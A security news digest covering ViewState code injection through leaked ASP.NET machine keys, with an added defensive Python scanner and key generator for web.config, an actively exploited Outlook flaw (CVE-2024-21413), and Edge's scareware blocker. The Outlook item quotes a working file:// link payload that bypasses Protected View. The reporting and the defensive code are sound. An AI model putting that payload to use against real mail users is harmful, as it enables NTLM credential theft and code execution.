Microsoft has warned about attackers exploiting exposed ASP.NET machine keys to deploy malware through ViewState code injection attacks. According to Microsoft Threat Intelligence experts, some developers have unknowingly copied ASP.NET validationKey and decryptionKey values found in public code documentation and repositories into their own software.
How Attackers Exploit ASP.NET Keys
Threat actors use these publicly available machine keys to create malicious ViewStates, the mechanism ASP.NET Web Forms uses to persist page state between requests. By attaching a message authentication code (MAC) computed with the leaked key, attackers can send these malicious ViewStates to targeted servers in POST requests.
Once the ASP.NET runtime on the server receives such a request, it decrypts and validates the ViewState data with its configured keys, and because the attacker signed the payload with those same keys, the check passes. This allows the attackers’ code to be loaded into the server’s memory and executed, giving them remote code execution (RCE) and the ability to deploy additional malware on the server.
In December 2024, an attacker used a publicly known machine key to deliver the Godzilla post-exploitation framework, which enables malicious command execution and shellcode injection on an Internet Information Services (IIS) web server.
Over 3,000 Keys at Risk
Microsoft identified over 3,000 publicly disclosed keys that could be used in these attacks. While previous ViewState code injection attacks typically involved stolen keys sold on dark web forums, these publicly available keys pose a greater risk because they are easy to find in code repositories and may be unknowingly integrated into development projects.
How to Protect Your Systems
To mitigate these risks, Microsoft recommends the following steps:
- Generate secure machine keys instead of using default or publicly available ones.
- Encrypt machineKey and connectionStrings elements to protect plaintext secrets.
- Upgrade to ASP.NET 4.8 to enable Antimalware Scan Interface (AMSI) capabilities.
- Harden Windows Servers using attack surface reduction rules, such as blocking web shell creation.
Microsoft has also removed key samples from its documentation and shared detailed steps for replacing ASP.NET keys using PowerShell or the IIS manager console.
However, Microsoft warns that simply rotating keys may not be enough if attackers have already compromised a system. In such cases, a thorough investigation is recommended, especially for web-facing servers, which may require reformatting and reinstallation to ensure security.
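The first two mitigation steps above can be checked and carried out with a small audit script. The following is an added example, not code from Microsoft or from the article: it flags machineKey attributes in a web.config that hold a literal (and therefore potentially disclosed) key rather than AutoGenerate, and generates a fresh random replacement pair. The sample web.config and its hex values are constructed for the example and are not real keys.

```python
import re
import secrets
import xml.etree.ElementTree as ET

# Constructed sample web.config with hard-coded keys. The hex values are placeholders
# made up for this example, not any real or disclosed key.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>
"""

HEX_KEY = re.compile(r"^[0-9A-Fa-f]+$")


def find_hardcoded_machine_keys(config_xml):
    """Return (attribute, key length in bytes) for every machineKey attribute that holds a
    literal hex key instead of AutoGenerate. A literal key sitting in a config file that is
    committed to a repository or pasted into documentation must be treated as disclosed:
    anyone holding it can produce a ViewState MAC that the server will accept."""
    findings = []
    for mk in ET.fromstring(config_xml).iter("machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate").split(",")[0]  # drop ",IsolateApps"
            if HEX_KEY.match(value):
                findings.append((attr, len(value) // 2))
    return findings


def generate_machine_key():
    """Fresh random keys from the OS CSPRNG: a 64-byte validation key for HMACSHA256 and a
    32-byte decryption key for AES. Generate per site; never commit the result."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def render_machine_key(keys):
    """Render the replacement <machineKey /> element to paste into web.config."""
    return "<machineKey " + " ".join(f'{k}="{v}"' for k, v in keys.items()) + " />"


if __name__ == "__main__":
    for attr, nbytes in find_hardcoded_machine_keys(SAMPLE_WEB_CONFIG):
        print(f"hard-coded {attr} ({nbytes} bytes) found - rotate it")
    print(render_machine_key(generate_machine_key()))
```

Run the scanner over every web.config in a repository before it is pushed; after rotating keys, remember the article's caveat that rotation alone does not evict an attacker who already has code running on the server.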
Critical Microsoft Outlook Vulnerability Now Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has alerted federal agencies about active attacks exploiting a critical Microsoft Outlook vulnerability, tracked as CVE-2024-21413.
What’s the Issue?
The flaw, discovered by Check Point researcher Haifei Li, is caused by improper input validation when opening emails with malicious links in vulnerable Outlook versions. This allows attackers to bypass the Protected View—a feature designed to block harmful content—and open malicious Office files in editing mode, giving them remote code execution capabilities.
Microsoft patched this vulnerability a year ago but warned that even the Preview Pane could be an attack vector, meaning users could be compromised just by previewing a malicious email.
How Attackers Are Exploiting This Flaw
Check Point found that attackers can bypass Outlook protections by embedding malicious links using the file:// protocol and adding an exclamation mark after the file extension, followed by random text. For example:
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
This vulnerability affects multiple Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019. Successful exploitation can result in the theft of NTLM credentials and allow attackers to execute arbitrary code via malicious Office documents.
Urgent Action Required
CISA has added CVE-2024-21413 to its Known Exploited Vulnerabilities (KEV) catalog, marking it as actively exploited. Federal agencies are required to patch this flaw by February 27 under Binding Operational Directive (BOD) 22-01. Private organizations are also strongly advised to prioritize patching to block ongoing attacks.
Microsoft Edge Update Introduces AI-Powered Scareware Blocker
Microsoft Edge version 133 is rolling out globally, bringing a powerful new feature: an AI-powered Scareware Blocker. This tool protects users from tech support scams that trick victims with fake warnings about malware infections.
How the Scareware Blocker Works
Unlike Microsoft Defender SmartScreen, which protects users from malicious sites, the new Scareware Blocker uses AI and machine learning to analyze web pages in real time. It compares full-screen scareware pages to thousands of sample scams collected from the security community. Importantly, this model runs locally on your device, meaning no images or data are sent to the cloud.
How to Enable the Feature
You can turn on the Scareware Blocker in Edge Settings. Update to Edge version 133, then navigate to Settings > Privacy, Search, and Services to find the option.
Other Improvements in Edge 133
In addition to the Scareware Blocker, Edge 133 introduces performance improvements to the Downloads UI, which has been rewritten using WebUI 2.0. This new architecture reduces the size of the code and the amount of JavaScript needed to load the UI, resulting in faster performance. While you may not notice a visible change in the UI, downloads should now load quicker and more efficiently.